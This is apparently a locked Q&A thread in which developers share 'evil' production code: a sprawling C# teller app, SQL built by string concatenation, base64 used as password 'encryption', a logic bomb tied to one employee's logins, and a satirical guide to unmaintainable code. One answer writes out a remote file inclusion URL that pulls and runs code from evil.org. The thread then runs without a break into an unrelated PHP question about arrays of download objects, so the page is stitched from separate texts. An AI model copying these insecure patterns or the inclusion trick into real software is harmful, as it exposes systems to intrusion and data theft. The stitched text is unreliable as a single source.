As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance.
Closed 11 years ago.
Locked. This question and its answers are locked because the question is off-topic but has historical significance. It is not currently accepting new answers or interactions.
What is the most evil or dangerous code fragment you have ever seen in a production environment at a company? I've never encountered production code that I would consider to be deliberately malicious and evil, so I'm quite curious to see what others have found.
The most dangerous code I have ever seen was a stored procedure two linked-servers away from our core production database server. The stored procedure accepted any NVARCHAR(8000) parameter and executed the parameter on the target production server via an double-jump sp_executeSQL command. That is to say, the sp_executeSQL command executed another sp_executeSQL command in order to jump two linked servers. Oh, and the linked server account had sysadmin rights on the target production server.
Warning: Long scary post ahead
I've written about one application I've worked on before here and here. To put it simply, my company inherited 130,000 lines of garbage from India. The application was written in C#; it was a teller app, the same kind of software tellers use behind the counter whenever you go to the bank. The app crashed 40-50 times a day, and it simply couldn't be refactored into working code. My company had to re-write the entire app over the course of 12 months.
Why is this application evil? Because the sight of the source code was enough to drive a sane man mad and a mad man sane. The twisted logic used to write this application could have only been inspired by a Lovecraftian nightmare. Unique features of this application included:
Out of 130,000 lines of code, the entire application contained 5 classes (excluding form files). All of these were public static classes. One class was called Globals.cs, which contained 1000s and 1000s and 1000s of public static variables used to hold the entire state of the application. Those five classes contained 20,000 lines of code total, with the remaining code embedded in the forms.
You have to wonder, how did the programmers manage to write such a big application without any classes? What did they use to represent their data objects? It turns out the programmers managed to re-invent half of the concepts we all learned about OOP simply by combining ArrayLists, HashTables, and DataTables. We saw a lot of this:
ArrayLists of hashtables
Hashtables with string keys and DataRow values
ArrayLists of DataTables
DataRows containing ArrayLists which contained HashTables
ArrayLists of DataRows
ArrayLists of ArrayLists
HashTables with string keys and HashTable values
ArrayLists of ArrayLists of HashTables
Every other combination of ArrayLists, HashTables, DataTables you can think of.
Keep in mind, none of the data structures above are strongly typed, so you have to cast whatever mystery object you get out of the list to the correct type. It's amazing what kind of complex, Rube Goldberg-like data structures you can create using just ArrayLists, HashTables, and DataTables.
To share an example of how to use the object model detailed above, consider Accounts: the original programmer created a seperate HashTable for each concievable property of an account: a HashTable called hstAcctExists, hstAcctNeedsOverride, hstAcctFirstName. The keys for all of those hashtables was a “|” separated string. Conceivable keys included “123456|DDA”, “24100|SVG”, “100|LNS”, etc.
Since the state of the entire application was readily accessible from global variables, the programmers found it unnecessary to pass parameters to methods. I'd say 90% of methods took 0 parameters. Of the few which did, all parameters were passed as strings for convenience, regardless of what the string represented.
Side-effect free functions did not exist. Every method modified 1 or more variables in the Globals class. Not all side-effects made sense; for example, one of the form validation methods had a mysterious side effect of calculating over and short payments on loans for whatever account was stored Globals.lngAcctNum.
Although there were lots of forms, there was one form to rule them all: frmMain.cs, which contained a whopping 20,000 lines of code. What did frmMain do? Everything. It looked up accounts, printed receipts, dispensed cash, it did everything.
Sometimes other forms needed to call methods on frmMain. Rather than factor that code out of the form into a seperate class, why not just invoke the code directly:
((frmMain)this.MDIParent).UpdateStatusBar(hstValues);
To look up accounts, the programmers did something like this:
bool blnAccountExists =
new frmAccounts().GetAccountInfo().blnAccountExists
As bad as it already is creating an invisible form to perform business logic, how do you think the form knew which account to look up? That’s easy: the form could access Globals.lngAcctNum and Globals.strAcctType. (Who doesn't love Hungarian notation?)
Code-reuse was a synonym for ctrl-c, ctrl-v. I found 200-line methods copy/pasted across 20 forms.
The application had a bizarre threading model, something I like to call the thread-and-timer model: each form that spawned a thread had a timer on it. Each thread that was spawned kicked off a timer which had a 200 ms delay; once the timer started, it would check to see if the thread had set some magic boolean, then it would abort the thread. The resulting ThreadAbortException was swallowed.
You'd think you'd only see this pattern once, but I found it in at least 10 different places.
Speaking of threads, the keyword "lock" never appeared in the application. Threads manipulated global state freely without taking a lock.
Every method in the application contained a try/catch block. Every exception was logged and swallowed.
Who needs to switch on enums when switching on strings is just as easy!
Some genius figured out that you can hook multiple form controls up to the same event handler. How did the programmer handle this?
private void OperationButton_Click(object sender, EventArgs e)
{
Button btn = (Button)sender;
if (blnModeIsAddMc)
{
AddMcOperationKeyPress(btn);
}
else
{
string strToBeAppendedLater = string.Empty;
if (btn.Name != "btnBS")
{
UpdateText();
}
if (txtEdit.Text.Trim() != "Error")
{
SaveFormState();
}
switch (btn.Name)
{
case "btnC":
ResetValues();
break;
case "btnCE":
txtEdit.Text = "0";
break;
case "btnBS":
if (!blnStartedNew)
{
string EditText = txtEdit.Text.Substring(0, txtEdit.Text.Length - 1);
DisplayValue((EditText == string.Empty) ? "0" : EditText);
}
break;
case "btnPercent":
blnAfterOp = true;
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, false);
decCurrValue = decResultValue * decCurrValue / intFormatFactor;
DisplayValue(GetValueString(decCurrValue));
AddToTape(GetValueString(decCurrValue), string.Empty, true, false);
strToBeAppendedLater = GetValueString(decResultValue).PadLeft(20)
+ strOpPressed.PadRight(3);
if (arrLstTapeHist.Count == 0)
{
arrLstTapeHist.Add(strToBeAppendedLater);
}
blnEqualOccurred = false;
blnStartedNew = true;
}
break;
case "btnAdd":
case "btnSubtract":
case "btnMultiply":
case "btnDivide":
blnAfterOp = true;
if (txtEdit.Text.Trim() == "Error")
{
btnC.PerformClick();
return;
}
if (blnNumPressed || blnEqualOccurred)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (Operation())
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue(GetValueString(decResultValue));
}
else
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue("Error");
}
strOpPressed = btn.Text;
blnEqualOccurred = false;
blnNumPressed = false;
}
}
else
{
strOpPressed = btn.Text;
AddToTape(GetValueString(0), (string)btn.Text, false, false);
}
if (txtEdit.Text.Trim() == "Error")
{
AddToTape("Error", string.Empty, true, true);
btnC.PerformClick();
txtEdit.Text = "Error";
}
break;
case "btnEqual":
blnAfterOp = false;
if (strOpPressed != string.Empty || strPrevOp != string.Empty)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (OperationEqual())
{
DisplayValue(GetValueString(decResultValue));
}
else
{
DisplayValue("Error");
}
if (!blnEqualOccurred)
{
strPrevOp = strOpPressed;
decHistValue = decCurrValue;
blnNumPressed = false;
blnEqualOccurred = true;
}
strOpPressed = string.Empty;
}
}
break;
case "btnSign":
GetValueDecimal(txtEdit.Text, out decCurrValue);
DisplayValue(GetValueString(-1 * decCurrValue));
break;
}
}
}
The same genius also discovered the glorious ternary operator. Here are some code samples:
frmTranHist.cs [line 812]:
strDrCr = chkCredits.Checked && chkDebits.Checked ? string.Empty
: chkDebits.Checked ? "D"
: chkCredits.Checked ? "C"
: "N";
frmTellTransHist.cs [line 961]:
if (strDefaultVals == strNowVals && (dsTranHist == null ? true : dsTranHist.Tables.Count == 0 ? true : dsTranHist.Tables[0].Rows.Count == 0 ? true : false))
frmMain.TellCash.cs [line 727]:
if (Validations(parPostMode == "ADD" ? true : false))
Here's a code snippet which demonstrates the typical misuse of the StringBuilder. Note how the programmer concats a string in a loop, then appends the resulting string to the StringBuilder:
private string CreateGridString()
{
string strTemp = string.Empty;
StringBuilder strBuild = new StringBuilder();
foreach (DataGridViewRow dgrRow in dgvAcctHist.Rows)
{
strTemp = ((DataRowView)dgrRow.DataBoundItem)["Hst_chknum"].ToString().PadLeft(8, ' ');
strTemp += " ";
strTemp += Convert.ToDateTime(((DataRowView)dgrRow.DataBoundItem)["Hst_trandt"]).ToString("MM/dd/yyyy");
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_DrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_CrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_trancd"].ToString().PadLeft(4, ' ');
strTemp += " ";
strTemp += GetDescriptionString(((DataRowView)dgrRow.DataBoundItem)["Hst_desc"].ToString(), 30, 62);
strBuild.AppendLine(strTemp);
}
strCreateGridString = strBuild.ToString();
return strCreateGridString;//strBuild.ToString();
}
No primary keys, indexes, or foreign key constraints existed on tables, nearly all fields were of type varchar(50), and 100% of fields were nullable. Interestingly, bit fields were not used to store boolean data; instead a char(1) field was used, and the characters 'Y' and 'N' used to represent true and false respectively.
Speaking of the database, here's a representative example of a stored procedure:
ALTER PROCEDURE [dbo].[Get_TransHist]
(
#TellerID int = null,
#CashDrawer int = null,
#AcctNum bigint = null,
#StartDate datetime = null,
#EndDate datetime = null,
#StartTranAmt decimal(18,2) = null,
#EndTranAmt decimal(18,2) = null,
#TranCode int = null,
#TranType int = null
)
AS
declare #WhereCond Varchar(1000)
declare #strQuery Varchar(2000)
Set #WhereCond = ' '
Set #strQuery = ' '
If not #TellerID is null
Set #WhereCond = #WhereCond + ' AND TT.TellerID = ' + Cast(#TellerID as varchar)
If not #CashDrawer is null
Set #WhereCond = #WhereCond + ' AND TT.CDId = ' + Cast(#CashDrawer as varchar)
If not #AcctNum is null
Set #WhereCond = #WhereCond + ' AND TT.AcctNbr = ' + Cast(#AcctNum as varchar)
If not #StartDate is null
Set #WhereCond = #WhereCond + ' AND Convert(varchar,TT.PostDate,121) >= ''' + Convert(varchar,#StartDate,121) + ''''
If not #EndDate is null
Set #WhereCond = #WhereCond + ' AND Convert(varchar,TT.PostDate,121) <= ''' + Convert(varchar,#EndDate,121) + ''''
If not #TranCode is null
Set #WhereCond = #WhereCond + ' AND TT.TranCode = ' + Cast(#TranCode as varchar)
If not #EndTranAmt is null
Set #WhereCond = #WhereCond + ' AND TT.TranAmt <= ' + Cast(#EndTranAmt as varchar)
If not #StartTranAmt is null
Set #WhereCond = #WhereCond + ' AND TT.TranAmt >= ' + Cast(#StartTranAmt as varchar)
If not (#TranType is null or #TranType = -1)
Set #WhereCond = #WhereCond + ' AND TT.DocType = ' + Cast(#TranType as varchar)
--Get the Teller Transaction Records according to the filters
Set #strQuery = 'SELECT
TT.TranAmt as [Transaction Amount],
TT.TranCode as [Transaction Code],
RTrim(LTrim(TT.TranDesc)) as [Transaction Description],
TT.AcctNbr as [Account Number],
TT.TranID as [Transaction Number],
Convert(varchar,TT.ActivityDateTime,101) as [Activity Date],
Convert(varchar,TT.EffDate,101) as [Effective Date],
Convert(varchar,TT.PostDate,101) as [Post Date],
Convert(varchar,TT.ActivityDateTime,108) as [Time],
TT.BatchID,
TT.ItemID,
isnull(TT.DocumentID, 0) as DocumentID,
TT.TellerName,
TT.CDId,
TT.ChkNbr,
RTrim(LTrim(DT.DocTypeDescr)) as DocTypeDescr,
(CASE WHEN TT.TranMode = ''F'' THEN ''Offline'' ELSE ''Online'' END) TranMode,
DispensedYN
FROM TellerTrans TT WITH (NOLOCK)
LEFT OUTER JOIN DocumentTypes DT WITH (NOLOCK) on DocType = DocumentType
WHERE IsNull(TT.DeletedYN, 0) = 0 ' + #WhereCond + ' Order By BatchId, TranID, ItemID'
Exec (#strQuery)
With all that said, the single biggest problem with this 130,000 line application this: no unit tests.
Yes, I have sent this story to TheDailyWTF, and then I quit my job.
In a system which took credit card payments we used to store the full credit card number along with name, expiration date etc.
Turns out this is illegal, which is ironic given the we were writing the program for the Justice Department at the time.
I've seen a password encryption function like this
function EncryptPassword($password)
{
return base64_encode($password);
}
This was the error handling routine in a piece of commercial code:
/* FIXME! */
while (TRUE)
;
I was supposed to find out why "the app keeps locking up".
Combination of all of the following Php 'Features' at once.
Register Globals
Variable Variables
Inclusion of remote files and code via include("http:// ... ");
Really Horrific Array/Variable names ( Literal example ):
foreach( $variablesarry as $variablearry ){
include( $$variablearry );
}
( I literally spent an hour trying to work out how that worked before I realised they wern't the same variable )
Include 50 files, which each include 50 files, and stuff is performed linearly/procedurally across all 50 files in conditional and unpredictable ways.
For those who don't know variable variables:
$x = "hello";
$$x = "world";
print $hello # "world" ;
Now consider $x contains a value from your URL ( register globals magic ), so nowhere in your code is it obvious what variable your working with becuase its all determined by the url.
Now consider what happens when the contents of that variable can be a url specified by the websites user.
Yes, this may not make sense to you, but it creates a variable named that url, ie:
$http://google.com,
except it cant be directly accessed, you have to use it via the double $ technique above.
Additionally, when its possible for a user to specify a variable on the URL which indicates which file to include, there are nasty tricks like
http://foo.bar.com/baz.php?include=http://evil.org/evilcode.php
and if that variable turns up in include($include)
and 'evilcode.php' prints its code plaintext, and Php is inappropriately secured, php will just trundle off, download evilcode.php, and execute it as the user of the web-server.
The web-sever will give it all its permissions etc, permiting shell calls, downloading arbitrary binaries and running them, etc etc, until eventually you wonder why you have a box running out of disk space, and one dir has 8GB of pirated movies with italian dubbing, being shared on IRC via a bot.
I'm just thankful I discovered that atrocity before the script running the attack decided to do something really dangerous like harvest extremely confidential information from the more or less unsecured database :|
( I could entertain the dailywtf every day for 6 months with that codebase, I kid you not. Its just a shame I discovered the dailywtf after I escaped that code )
In the main project header file, from an old-hand COBOL programmer, who was inexplicably writing a compiler in C:
int i, j, k;
"So you won't get a compiler error if you forget to declare your loop variables."
The Windows installer.
This article How to Write Unmaintainable Code covers some of the most brilliant techniques known to man. Some of my favorite ones are:
New Uses For Names For Baby
Buy a copy of a baby naming book and you'll never be at a loss for variable names. Fred is a wonderful name, and easy to type. If you're looking for easy-to-type variable names, try adsf or aoeu if you type with a DSK keyboard.
Creative Miss-spelling
If you must use descriptive variable and function names, misspell them. By misspelling in some function and variable names, and spelling it correctly in others (such as SetPintleOpening SetPintalClosing) we effectively negate the use of grep or IDE search techniques. It works amazingly well. Add an international flavor by spelling tory or tori in different theatres/theaters.
Be Abstract
In naming functions and variables, make heavy use of abstract words like it, everything, data, handle, stuff, do, routine, perform and the digits e.g. routineX48, PerformDataFunction, DoIt, HandleStuff and do_args_method.
CapiTaliSaTion
Randomly capitalize the first letter of a syllable in the middle of a word. For example ComputeRasterHistoGram().
Lower Case l Looks a Lot Like the Digit 1
Use lower case l to indicate long constants. e.g. 10l is more likely to be mistaken for 101 that 10L is. Ban any fonts that clearly disambiguate uvw wW gq9 2z 5s il17|!j oO08 `'" ;,. m nn rn {[()]}. Be creative.
Recycle Your Variables
Wherever scope rules permit, reuse existing unrelated variable names. Similarly, use the same temporary variable for two unrelated purposes (purporting to save stack slots). For a fiendish variant, morph the variable, for example, assign a value to a variable at the top of a very long method, and then somewhere in the middle, change the meaning of the variable in a subtle way, such as converting it from a 0-based coordinate to a 1-based coordinate. Be certain not to document this change in meaning.
Cd wrttn wtht vwls s mch trsr
When using abbreviations inside variable or method names, break the boredom with several variants for the same word, and even spell it out longhand once in while. This helps defeat those lazy bums who use text search to understand only some aspect of your program. Consider variant spellings as a variant on the ploy, e.g. mixing International colour, with American color and dude-speak kulerz. If you spell out names in full, there is only one possible way to spell each name. These are too easy for the maintenance programmer to remember. Because there are so many different ways to abbreviate a word, with abbreviations, you can have several different variables that all have the same apparent purpose. As an added bonus, the maintenance programmer might not even notice they are separate variables.
Obscure film references
Use constant names like LancelotsFavouriteColour instead of blue and assign it hex value of $0204FB. The color looks identical to pure blue on the screen, and a maintenance programmer would have to work out 0204FB (or use some graphic tool) to know what it looks like. Only someone intimately familiar with Monty Python and the Holy Grail would know that Lancelot's favorite color was blue. If a maintenance programmer can't quote entire Monty Python movies from memory, he or she has no business being a programmer.
Document the obvious
Pepper the code with comments like /* add 1 to i */ however, never document wooly stuff like the overall purpose of the package or method.
Document How Not Why
Document only the details of what a program does, not what it is attempting to accomplish. That way, if there is a bug, the fixer will have no clue what the code should be doing.
Side Effects
In C, functions are supposed to be idempotent, (without side effects). I hope that hint is sufficient.
Use Octal
Smuggle octal literals into a list of decimal numbers like this:
array = new int []
{
111,
120,
013,
121,
};
Extended ASCII
Extended ASCII characters are perfectly valid as variable names, including ß, Ð, and ñ characters. They are almost impossible to type without copying/pasting in a simple text editor.
Names From Other Languages
Use foreign language dictionaries as a source for variable names. For example, use the German punkt for point. Maintenance coders, without your firm grasp of German, will enjoy the multicultural experience of deciphering the meaning.
Names From Mathematics
Choose variable names that masquerade as mathematical operators, e.g.:
openParen = (slash + asterix) / equals;
Code That Masquerades As Comments and Vice Versa
Include sections of code that is commented out but at first glance does not appear to be.
for(j=0; j<array_len; j+ =8)
{
total += array[j+0 ];
total += array[j+1 ];
total += array[j+2 ]; /* Main body of
total += array[j+3]; * loop is unrolled
total += array[j+4]; * for greater speed.
total += array[j+5]; */
total += array[j+6 ];
total += array[j+7 ];
}
Without the colour coding would you notice that three lines of code are commented out?
Arbitrary Names That Masquerade as Keywords
When documenting, and you need an arbitrary name to represent a filename use "file ". Never use an obviously arbitrary name like "Charlie.dat" or "Frodo.txt". In general, in your examples, use arbitrary names that sound as much like reserved keywords as possible. For example, good names for parameters or variables would be"bank", "blank", "class", "const ", "constant", "input", "key", "keyword", "kind", "output", "parameter" "parm", "system", "type", "value", "var" and "variable ". If you use actual reserved words for your arbitrary names, which would be rejected by your command processor or compiler, so much the better. If you do this well, the users will be hopelessly confused between reserved keywords and arbitrary names in your example, but you can look innocent, claiming you did it to help them associate the appropriate purpose with each variable.
Code Names Must Not Match Screen Names
Choose your variable names to have absolutely no relation to the labels used when such variables are displayed on the screen. E.g. on the screen label the field "Postal Code" but in the code call the associated variable "zip".
Choosing The Best Overload Operator
In C++, overload +,-,*,/ to do things totally unrelated to addition, subtraction etc. After all, if the Stroustroup can use the shift operator to do I/O, why should you not be equally creative? If you overload +, make sure you do it in a way that i = i + 5; has a totally different meaning from i += 5; Here is an example of elevating overloading operator obfuscation to a high art. Overload the '!' operator for a class, but have the overload have nothing to do with inverting or negating. Make it return an integer. Then, in order to get a logical value for it, you must use '! !'. However, this inverts the logic, so [drum roll] you must use '! ! !'. Don't confuse the ! operator, which returns a boolean 0 or 1, with the ~ bitwise logical negation operator.
Exceptions
I am going to let you in on a little-known coding secret. Exceptions are a pain in the behind. Properly-written code never fails, so exceptions are actually unnecessary. Don't waste time on them. Subclassing exceptions is for incompetents who know their code will fail. You can greatly simplify your program by having only a single try/catch in the entire application (in main) that calls System.exit(). Just stick a perfectly standard set of throws on every method header whether they could actually throw any exceptions or not.
Magic Matrix Locations
Use special values in certain matrix locations as flags. A good choice is the [3][0] element in a transformation matrix used with a homogeneous coordinate system.
Magic Array Slots revisited
If you need several variables of a given type, just define an array of them, then access them by number. Pick a numbering convention that only you know and don't document it. And don't bother to define #define constants for the indexes. Everybody should just know that the global variable widget[15] is the cancel button. This is just an up-to-date variant on using absolute numerical addresses in assembler code.
Never Beautify
Never use an automated source code tidier (beautifier) to keep your code aligned. Lobby to have them banned them from your company on the grounds they create false deltas in PVCS/CVS (version control tracking) or that every programmer should have his own indenting style held forever sacrosanct for any module he wrote. Insist that other programmers observe those idiosyncratic conventions in "his " modules. Banning beautifiers is quite easy, even though they save the millions of keystrokes doing manual alignment and days wasted misinterpreting poorly aligned code. Just insist that everyone use the same tidied format, not just for storing in the common repository, but also while they are editing. This starts an RWAR and the boss, to keep the peace, will ban automated tidying. Without automated tidying, you are now free to accidentally misalign the code to give the optical illusion that bodies of loops and ifs are longer or shorter than they really are, or that else clauses match a different if than they really do. e.g.
if(a)
if(b) x=y;
else x=z;
Testing is for cowards
A brave coder will bypass that step. Too many programmers are afraid of their boss, afraid of losing their job, afraid of customer hate mail and afraid of being sued. This fear paralyzes action, and reduces productivity. Studies have shown that eliminating the test phase means that managers can set ship dates well in advance, an obvious aid in the planning process. With fear gone, innovation and experimentation can blossom. The role of the programmer is to produce code, and debugging can be done by a cooperative effort on the part of the help desk and the legacy maintenance group.
If we have full confidence in our coding ability, then testing will be unnecessary. If we look at this logically, then any fool can recognise that testing does not even attempt to solve a technical problem, rather, this is a problem of emotional confidence. A more efficient solution to this lack of confidence issue is to eliminate testing completely and send our programmers to self-esteem courses. After all, if we choose to do testing, then we have to test every program change, but we only need to send the programmers to one course on building self-esteem. The cost benefit is as amazing as it is obvious.
Reverse the Usual True False Convention
Reverse the usual definitions of true and false. Sounds very obvious but it works great. You can hide:
#define TRUE 0
#define FALSE 1
somewhere deep in the code so that it is dredged up from the bowels of the program from some file that noone ever looks at anymore. Then force the program to do comparisons like:
if ( var == TRUE )
if ( var != FALSE )
someone is bound to "correct" the apparent redundancy, and use var elsewhere in the usual way:
if ( var )
Another technique is to make TRUE and FALSE have the same value, though most would consider that out and out cheating. Using values 1 and 2 or -1 and 0 is a more subtle way to trip people up and still look respectable. You can use this same technique in Java by defining a static constant called TRUE. Programmers might be more suspicious you are up to no good since there is a built-in literal true in Java.
Exploit Schizophrenia
Java is schizophrenic about array declarations. You can do them the old C, way String x[], (which uses mixed pre-postfix notation) or the new way String[] x, which uses pure prefix notation. If you want to really confuse people, mix the notationse.g.
byte[ ] rowvector, colvector , matrix[ ];
which is equivalent to:
byte[ ] rowvector;
byte[ ] colvector;
byte[ ][] matrix;
I don't know if I'd call the code "evil", but we had a developer who would create Object[] arrays instead of writing classes. Everywhere.
I have seen (and posted to thedailywtf) code that will give everyone to have administrator rights in significant part of an application on Tuesdays. I guess the original developer forgot to remove the code after local machine testing.
I don't know if this is "evil" so much as misguided (I recently posted it on The Old New Thing):
I knew one guy who loved to store information as delimited strings. He was familiar with the concept of arrays, as shown when he used arrays of delimited strings, but the light bulb never lit up.
Base 36 encoding to store ints in strings.
I guess the theory goes somewhat along the lines of:
Hexadecimal is used to represent numbers
Hexadecimal doesnt use letters beyond F, meaning G-Z are wasted
Waste is bad
At this moment I am working with a database that is storing the days of the week that an event can happen on as a 7-bit bitfield (0-127), stored in the database as a 2-character string ranging from '0' to '3J'.
I remember seeing a login handler that took a post request, and redirected to a GET with the user name and password passed in as parameters. This was for an "enterprise class" medical system.
I noticed this while checking some logs - I was very tempted to send the CEO his password.
Really evil was this piece of brilliant delphi code:
type
TMyClass = class
private
FField : Integer;
public
procedure DoSomething;
end;
var
myclass : TMyClass;
procedure TMyClass.DoSomething;
begin
myclass.FField := xxx; //
end;
It worked great if there was only one instance of a class. But unfortunately I had to use an other instance and that created lots of interesting bugs.
When I found this jewel, I can't remember if I fainted or screamed, probably both.
Maybe not evil, but certainly rather, um... misguided.
I once had to rewrite a "natural language parser" that was implemented as a single 5,000 line if...then statement.
as in...
if (text == "hello" || text == "hi")
response = "hello";
else if (text == "goodbye")
response = "bye";
else
...
I saw code in an ASP.NET MVC site from a guy who had only done web forms before (and is a renowned copy/paster!) that stuck a client side click event on an <a> tag that called a javascript method that did a document.location.
I tried to explain that a href on the <a> tag would do the same!!!
A little evil...someone I know wrote into the main internal company web app, a daily check to see if he has logged into the system in the past 10 days. If there's no record of him logged in, it disables the app for everyone in the company.
He wrote the piece once he heard rumors of layoffs, and if he was going down, the company would have to suffer.
The only reason I knew about it, is that he took a 2 week vacation & I called him when the site crapped out. He told me to log on with his username/password...and all was fine again.
Of course..months later we all got laid off.
My colleague likes to recall that ASP.NET application which used a public static database connection for all database work.
Yes, one connection for all requests. And no, there was no locking done either.
I remember having to setup IIS 3 to run Perl CGI scripts (yes, that was a looong time ago). The official recommendation at that time was to put Perl.exe in cgi-bin. It worked, but it also gave everyone access to a pretty powerful scripting engine!
Any RFC 3514-compliant program which sets the evil bit.
SQL queries right there in javascript in an ASP application. Can't get any dirtier...
We had an application that loaded all of it's global state in an xml file. No problem with that, except that the developer had created a new form of recursion.
<settings>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
Then comes the fun part. When the application loads, it runs through the list of properties and adds them to a global (flat) list, along with incrementing a mystery counter. The mystery counter is named something totally irrelevant and is used in mystery calculations:
List properties = new List();
Node<-root
while node.hasNode("property")
add to properties list
my_global_variable++;
if hasNode("property")
node=getNode("property"), ... etc etc
And then you get functions like
calculateSumOfCombinations(int x, int y){
return x+y+my_global_variable;
}
edit: clarification - Took me a long time to figure out that he was counting the depth of the recursion, because at level 6 or 7 the properties changed meaning, so he was using the counter to split his flat set into 2 sets of different types, kind of like having a list of STATE, STATE, STATE, CITY, CITY, CITY and checking if the index > counter to see if your name is a city or state)
Instead of writing a Windows service for a server process that needed to run constantly one of our "architects" wrote a console app and used the task scheduler to run it every 60 seconds.
Keep in mind this is in .NET where services are very easy to create.
--
Also, at the same place a console app was used to host a .NET remoting service, so they had to start the console app and lock a session to keep it running every time the server was rebooted.
--
At the last place I worked one of the architects had a single C# source code file with over 100 classes that was something like 250K in size.
32 source code files with more then 10K lines of code each. Each contained one class. Each class contained one method that did "everything"
That was real nightmare for debuging that code before I had to refactor that.
At an earlier workplace, we inherited a legacy project, which partially had been outsorced earlier. The main app was Java, the outsourced part was a native C library. Once I had a look at the C source files. I listed the contents of the directory. There were several source files over 200K in size. The biggest C file was 600 Kbytes.
Thank God I never had to actually touch them :-)
I was given a set of programs to advance while colleagues were abroad at a customer (installing said programs). One key library came up in every program, and trying to figure out the code, I realised that there were tiny differences from one program to the next. In a common library.
Realising this, I ran a text comparison of all copies. Out of 16, I think there were about 9 unique ones. I threw a bit of a fit.
The boss intervened and had the colleagues collate a version that was seemingly universal. They sent the code by e-mail. Unknown to me, there were strings with unprintable characters in there, and some mixed encodings. The e-mail garbled it pretty bad.
The unprintable characters were used to send out data (all strings!) from a server to a client. All strings were thus separated by the 0x03 character on the server-side, and re-assembled client-side in C# using the Split function.
The somwehat sane way would have been to do:
someVariable.Split(Convert.ToChar(0x03);
The saner and friendly way would have been to use a constant:
private const char StringSeparator = (char)0x03;
//...
someVariable.Split(StringSeparator);
The EVIL way was what my colleagues chose: use whatever "prints" for 0x03 in Visual Studio and put that between quotes:
someVariable.Split('/*unprintable character*/');
Furthermore, in this library (and all the related programs), not a single variable was local (I checked!). Functions were designed to either recuperate the same variables once it was deemed safe to waste them, or to create new ones which would live on for all the duration of the process. I printed out several pages and colour coded them. Yellow meant "global, never changed by another function", Red meant "global, changed by several". Green would have been "local", but there was none.
Oh, did I mention control version? Because of course there was none.
ADD ON: I just remembered a function I discovered, not long ago.
Its purpose was to go through an array of arrays of intergers, and set each first and last item to 0. It went like this (not actual code, from memory, and more C#-esque):
FixAllArrays()
{
for (int idx = 0; idx < arrays.count- 1; idx++)
{
currArray = arrays[idx];
nextArray = arrays[idx+1];
SetFirstToZero(currArray);
SetLastToZero(nextArray);
//This is where the fun starts
if (idx == 0)
{
SetLastToZero(currArray);
}
if (idx == arrays.count- 1)
{
SetFirstToZero(nextArray);
}
}
}
Of course, the point was that every sub-array had to get this done, both operations, on all items. I'm just not sure how a programmer can decide on something like this.
Similar to what someone else mentioned above:
I worked in a place that had a pseudo-scripting language in the application. It fed into a massive method that had some 30 parameters and a giant Select Case statement.
It was time to add more parameters, but the guy on the team who had to do it realized that there were too many already.
His solution?
He added a single object parameter on the end, so he could pass in anything he wanted and then cast it.
I couldn't get out of that place fast enough.
Once after our client teams reported some weird problems, we noticed that two different versions of the application was pointing to the same database. (while deploying the new system to them, their database was upgraded, but everyone forgot to bring down their old system)
This was a miracle escape..
And since then, we have an automated build and deploy process, thankfully :-)
I think that it was a program which loaded a loop into the general purpose registers of a pdp-10 and then executed the code in those registers.
You could do that on a pdp-10. That doesn't mean that you should.
EDIT: at least this is to the best of my (sometimes quite shabby) recollection.
I had the deep misfortune of being involved in finding a rather insane behavior in a semi-custom database high-availability solution.
The core bits were unremarkable. Red Hat Enterprise Linux, MySQL, DRBD, and the Linux-HA stuff. The configuration, however, was maintained by a completely custom puppet-like system (unsurprisingly, there are many other examples of insanity resulting from this system).
It turns out that the system was checking the install.log file that Kickstart leaves in the root directory for part of the information it needed to create the DRBD configuration. This in itself is evil, of course. You don't pull configuration from a log file whose format is not actually defined. It gets worse, though.
It didn't store this data anywhere else, and every time it ran, which was every 60 seconds, it consulted install.log.
I'll just let you guess what happened the first time somebody decided to delete this otherwise useless log file.
This question is coded in pseudo-PHP, but I really don't mind what language I get answers in (except for Ruby :-P), as this is purely hypothetical. In fact, PHP is quite possibly the worst language to be doing this type of logic in. Unfortunately, I have never done this before, so I can't provide a real-world example. Therefore, hypothetical answers are completely acceptable.
Basically, I have lots of objects performing a task. For this example, let's say each object is a class that downloads a file from the Internet. Each object will be downloading a different file, and the downloads are run in parallel. Obviously, some objects may finish downloading before others. The actual grabbing of data may run in threads, but that is not relevant to this question.
So we can define the object as such:
class DownloaderObject() {
var $url = '';
var $downloading = false;
function DownloaderObject($v){ // constructor
$this->url = $v;
start_downloading_in_the_background(url=$this->$url, callback=$this->finished);
$this->downloading = true;
}
function finished() {
save_the_data_somewhere();
$this->downloading = false;
$this->destroy(); // actually destroys the object
}
}
Okay, so we have lots of these objects running:
$download1 = new DownloaderObject('http://somesite.com/latest_windows.iso');
$download2 = new DownloaderObject('http://somesite.com/kitchen_sink.iso');
$download3 = new DownloaderObject('http://somesite.com/heroes_part_1.rar');
And we can store them in an array:
$downloads = array($download1, $download2, $download3);
So we have an array full of the downloads:
array(
1 => $download1,
2 => $download2,
3 => $download3
)
And we can iterate through them like this:
print('Here are the downloads that are running:');
foreach ($downloads as $d) {
print($d->url . "\n");
}
Okay, now suppose download 2 finishes, and the object is destroyed. Now we should have two objects in the array:
array(
1 => $download1,
3 => $download3
)
But there is a hole in the array! Key #2 is being unused. Also, if I wanted to start a new download, it is unclear where to insert the download into the array. The following could work:
$i = 0;
while ($i < count($downloads) - 1) {
if (!is_object($downloads[$i])) {
$downloads[$i] = new DownloaderObject('http://somesite.com/doctorwho.iso');
break;
}
$i++;
}
However, that is terribly inefficient (and while $i++ loops are nooby). So, another approach is to keep a counter.
